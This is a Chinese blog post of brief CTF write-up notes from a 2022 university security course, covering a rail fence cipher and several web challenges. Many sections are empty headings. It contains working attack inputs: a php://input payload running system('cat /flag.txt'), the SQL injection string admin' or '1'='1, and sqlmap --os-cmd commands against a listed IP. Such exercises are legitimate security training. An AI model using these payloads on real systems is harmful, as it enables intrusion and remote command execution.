205 字
1 分钟
22年网安小学期-CTF
木册木兰

- 下载附件,然后根据提示可以看出就是栅栏密码,所以直接解密得到

inputer

- 先源码,这里要用到php://伪协议
- 直接抓包然后改包,构造
php://input,利用system("ls");输出当前目录下所包含的文件,发包后发现可利用

- 那就直接用命令
<?php system("cat /flag.txt");?>获得flag

WEB_blind_exec
![]()
LFI

baby_sql
admin' or '1'='1
WEB_randnum

WEB_babyphp

easy_getshell

sessionlfi
- 源码中发现页面传参使用get方法,猜测存在sql注入漏洞

测试payload:
sqlmap -u http://218.94.60.213:13198/table.php?id=1 -dbs
爆破数据库,共有4个数据库

使用sqlmap的-os-cmd远程执行命令,看到根目录有flag字样文件
sqlmap -u http://218.94.60.213:13198/table.php?id=1 —os-cmd=“ls /”

最后继续使用远程命令查看得到flag
sqlmap -u http://218.94.60.213:13198/table.php?id=1 —os-cmd=“cat /flag_asflkhasklfhaklshfkjlashfjkas”

happy
- 题目:

- 解题代码:

rsarsa
- 题目:

- 解题代码:

22年网安小学期-CTF
https://blog.crzliang.cn/archives/65465/